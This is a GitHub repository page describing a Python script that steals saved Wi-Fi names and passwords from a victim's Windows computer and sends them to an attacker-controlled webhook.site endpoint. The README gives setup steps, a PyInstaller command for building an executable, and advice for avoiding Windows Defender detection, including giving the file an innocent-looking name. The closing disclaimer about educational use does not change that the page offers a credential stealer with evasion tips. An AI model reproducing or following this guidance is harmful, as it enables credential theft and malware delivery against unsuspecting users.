Skip to content

learnwithaq/Hacking-WiFi-using-Python-and-Webhook

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

Python Script that Steal Wifi SSID & Passwords from the victims Windows OS.

Tested on Windows 10/11 (x64) Antivirus: Windows Defender (No Detection)

Requirements: Python 3.x

How to use:

  1. Open wifi-python-webhook.py in any code editor.
  2. Replace 'WEBHOOK ID' with your own. (You can get it simply from https://webhook.site)
  3. Save the file

Run the command: python wifi-python-webhook.py

To create .exe file use the following command: pyinstaller --onefile --onefile --distpath . --specpath . --workpath . --name wifi-python-webhook.py

The above command will bind python interpreter and every dependency within the exe file. This way Windows Defender will not consider it malicious exe. Also try not to make the filename look malicious.


⚠️ DISCLAIMER

This Python script is intended strictly for educational and authorized penetration testing purposes only.

You are solely responsible for how you use this code. Unauthorized access to Wi-Fi networks is illegal and unethical. By using this tool, you agree that:

  • You have explicit written permission to test the network.
  • You will not use this code for any unauthorized or malicious activities.
  • You comply with all local laws, regulations, and ethical hacking guidelines.

The creator of this script is not responsible for any damage, misuse, or legal consequences arising from its use.

🔐 Always hack ethically. Test responsibly. Learn securely.

About

This is a python script that will steal WiFi (SSID & Password) and send them via webhook.site

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages